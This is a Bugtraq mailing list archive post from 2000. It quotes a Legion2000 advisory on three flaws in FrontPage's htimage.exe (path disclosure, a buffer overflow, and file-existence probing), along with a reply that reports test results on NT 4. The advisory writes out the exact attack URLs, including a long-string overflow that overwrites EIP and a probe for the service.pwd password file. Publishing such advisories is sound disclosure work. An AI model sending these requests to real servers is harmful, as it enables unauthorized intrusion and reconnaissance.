Bugtraq mailing list archives
Re: More vulnerabilities in FP
From: cyberiad () CYBERUS CA (The Cyberiad)
Date: Wed, 19 Apr 2000 08:36:33 -0400
Hello, I apologize for the additional posting but I also tested the buffer overflow on NT 4SP4 with IIS installed from the Option Pack and the 742-A's did not cause a crash. The file disovery bug did work for files on the same volume as the webroot. Same order of path checking. If the files exist response is either, Error calling HTImage: No URL returned, not even default set for the picture. or, Error calling HTImage: HTImage.c: Syntax error at line 1 Bad field name, expecting 'default', 'rectangle', 'circle' or 'polygon' (got an alphanumeric string) First response when the file was a .txt or .bat. I noticed the same responses under Win98 PWS/FP. Cyberiad ----- Original Message ----- From: Narrow <narrow () HOBBITON ORG> To: <BUGTRAQ () SECURITYFOCUS COM> Sent: Tuesday, April 18, 2000 2:40 PM Subject: More vulnerabilities in FP
[ Reader(s), please Cc: your comments/etc to narrow () hobbiton org ]
---------------------------------------------------------------------------- ----
-------[ Legion2000 - Russian Security Team (ADV-150400#1) ]------- www.legion2000.cc ---- INFORMATION ---- Program Name : CERN Image Map Dispatcher Discovered By : Narrow (narrow () hobbiton org) --------------------- Problem Description ~~~~~~~~~~~~~~~~~~~ CERN Image Map Dispatcher (/cgi-bin/htimage.exe) comes by default with
FrontPage. I found three bugs
in "htimage.exe": 1) Gives us the full path to the root directory 2)
Simple buffer overflow 3) Allow
us to access files. Problem #1 ~~~~~~~~~~ Like I said, the first bug gives us the full path to the root directory. I
tested this vulnerability
against some servers, all where vulnerable! Tested / Vulnerable FP Servers: 3.0.2.926 (FrontPage'98), 3.0.2.1706,
4.0.2.2717, 2.0.1.927, 3.0.2.926,
3.0.2.1105, 3.0.2.1330, 3.0.2.1117 (All Windows based web servers are
vulnerable if we have premission
to execute "htimage.exe" + If "htimage.exe" exist). To test this vulnerability we need "htimage.exe" in our "cgi-bin"
directory (it's installed by default)
and premission to execute it. That's why only Windows is vulnerable, Unix
based systems can't execute
"*.exe" files. If we access "htimage.exe" using our favorite web browser like:
http://server/cgi-bin/htimage.exe/linux?0,0
we get this error: --------------------------------------------------------------------------
----------
Error Error calling HTImage: Picture config file not found, tried the following: q:/hidden_directory_because_of_the_script_kiddies/webroot/linux /linux --------------------------------------------------------------------------
----------
Now we know that the path to the root directory is
"q:/hidden_directory_because_of_the_script_kiddies/webroot/".
Problem #2 ~~~~~~~~~~ Like I said, simple buffer overflow. Tested against "Microsoft-PWS-95/2.0"
and "FrontPage-PWS32".
Tested / Vulnerable OS: Windows'95/98 "htimage.exe" buffer overflows if we access it like:
<A HREF="http://server/cgi-bin/htimage.exe/<741">http://server/cgi-bin/htimage.exe/<741</A> A's>?0,0.
--------------------------------------------------------------------------
----------
HTIMAGE caused an invalid page fault in module <unknown> at 0000:41414141. Registers: 0EAX=815c6240 CS=0137 EIP=41414141 EFLGS=00010246 EBX=0063fe28 SS=013f ESP=005400b4 EBP=005400d4 ECX=0054015c DS=013f ESI=005401a0 FS=3467 EDX=bff76648 ES=013f EDI=00540184 GS=0000 Bytes at CS:EIP: Stack dump: bff7663c 00540184 0063fe28 005401a0 0054015c 00540290 bff76648 0063fe28 0054016c bff85a0a 00540184 0063fe28 005401a0 0054015c 41414141 0054034c --------------------------------------------------------------------------
----------
<Server still running> + <500 Server Error> First remote FrontPage exploit? Problem #3 ~~~~~~~~~~ It's not a serious bug. Using "htimage.exe" we can access files on server,
but
we can't read them. Accessing "htimage.exe" like:
http://server/cgi-bin/htimage.exe/_vti_pvt/service.pwd?0,0
outputs: --------------------------------------------------------------------------
----------
Error Error calling HTImage: HTImage.c: Syntax error at line 1 Bad field name, expecting 'default',
'rectangle', 'circle' or
'polygon' (got an alphanumeric string) --------------------------------------------------------------------------
----------
NOTE: Accessing "/_vti_pvt/service.pwd" outputs : 403 Forbidden Solution ~~~~~~~~ 1) Remove "htimage.exe". 2) Do not use FrontPage, simple enough :) Comments ~~~~~~~~ Sorry for my bad english, not my mother/father language ;)
Current thread:
- response to the bugtraq report of buffer overruns in imapd LIST command, (continued)
- response to the bugtraq report of buffer overruns in imapd LIST command Mark Crispin (Apr 17)
- Re: response to the bugtraq report of buffer overruns in imapd LIST command Theo de Raadt (Apr 17)
- Re: response to the bugtraq report of buffer overruns in imapd LIST command Mark Crispin (Apr 17)
- Re: response to the bugtraq report of buffer overruns in imapd LIST command R. C. Dowdeswell (Apr 17)
- xfs security issues (fwd) Chris Evans (Apr 17)
- Re: response to the bugtraq report of buffer overruns in imapd LIST command Mark Crispin (Apr 17)
- RUS-CERT Advisory 200004-01: GNU Emacs 20 RUS-CERT, University of Stuttgart (Apr 18)
- More vulnerabilities in FP Narrow (Apr 18)
- Re: More vulnerabilities in FP The Cyberiad (Apr 19)
- Re: More vulnerabilities in FP Ron van Daal (Apr 22)
- Re: More vulnerabilities in FP The Cyberiad (Apr 19)
- AVM's Statement eAX [Teelicht] (Apr 19)
- Adtran DoS Mike Ireton (Apr 19)
- FreeBSD Security Advisory: FreeBSD-SA-00:13.generic-nqs FreeBSD Security Officer (Apr 19)
- Re: response to the bugtraq report of buffer overruns in imapd LIST command Warner Losh (Apr 17)
- pwdump2 for Active Directory Todd Sabin (Apr 18)
- Re: response to the bugtraq report of buffer overruns in imapd LIST command Henrik Nordstrom (Apr 18)
- Cooments on the dvwssr.dll vulnerability threads Iván Arce (Apr 17)
- Re: Cooments on the dvwssr.dll vulnerability threads David LeBlanc (Apr 18)
- Last call for extended abstracts - Raid 2000 - Deadline is April 30th Herve Debar (Apr 18)
- Re: response to the bugtraq report of buffer overruns in imapd LIST command Kris Kennaway (Apr 17)